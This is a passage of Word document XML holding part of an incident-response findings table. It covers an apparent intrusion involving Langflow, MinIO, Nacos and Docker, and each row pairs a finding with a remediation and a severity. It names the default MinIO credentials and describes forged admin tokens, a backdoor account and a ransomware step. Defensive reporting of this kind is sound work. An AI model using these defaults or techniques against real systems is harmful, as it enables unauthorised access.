              <w:t xml:space="preserve">4</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="25674B3B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">214 secrets exposed from Langflow's own Postgres backend, spanning 8 provider families (OpenAI, Anthropic, DeepSeek, Gemini, Alibaba, Aliyun, Tencent, Huawei) plus database logins and crypto wallets</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="04763BD7">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rotate every credential pulled in this dump immediately. Treat all 8 provider API keys, the database logins, and any wallet keys as burned.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="11CCB2DE">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6C05EF9D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4D3836E8">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MinIO reachable with factory default credentials (minioadmin:minioadmin)</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2CC1E688">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Change the MinIO root credentials. Disable the default account entirely if the platform supports it, and require unique credentials per deployment going forward.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4ABF02E6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="402AC008">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="08912067">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Plaintext credentials.json stored in the terraform-state MinIO bucket</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1F074072">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove the plaintext file from object storage. Move Terraform state and any embedded secrets to a proper secrets manager (Vault, AWS Secrets Manager, or equivalent) with encryption at rest.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6C05DD21">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3A088CAA">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="594EB6C4">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nacos config server running its default JWT signing key, unrotated since 2020</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="0D81A6B3">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rotate the Nacos JWT signing key now. Invalidate all previously issued tokens and force re-authentication for every legitimate service account.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3F9E6DCB">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="60EB64A9">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="64A8DD7A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor account svc_maint created on Nacos via a forged admin token</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2F6BFF3B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Delete the svc_maint account. Audit every account created or modified on ff-nacos-01 in the same window and confirm none of them were also created by the intruder.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1424EF6C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4FF91163">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="169707E5">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker socket (/var/run/docker.sock) reachable from the langflow-rce process</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2010C157">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrict docker.sock access to processes that actually need it. The application service account should never have a path to the container runtime socket.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3FD6D066">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="0A325B02">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2387D601">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">config_info and history tables encrypted and dropped on ff-db-01 (Nacos's config store and its own change log)</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="080AD010">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Restore both tables from the most recent clean backup and verify row counts and referential integrity before bringing Nacos back online. Do not attempt to pay for or recover the AES key; it was never persisted and isn't recoverable from telemetry.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="77FE8811">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="53B42C65">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="58A61867">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">README_RANSOM table and ransom note left in the production database</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5583B792">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove the artifact once evidence has been captured (screenshots, query results already collected in this report). Do not make contact with the address in the note.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="707D0221">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
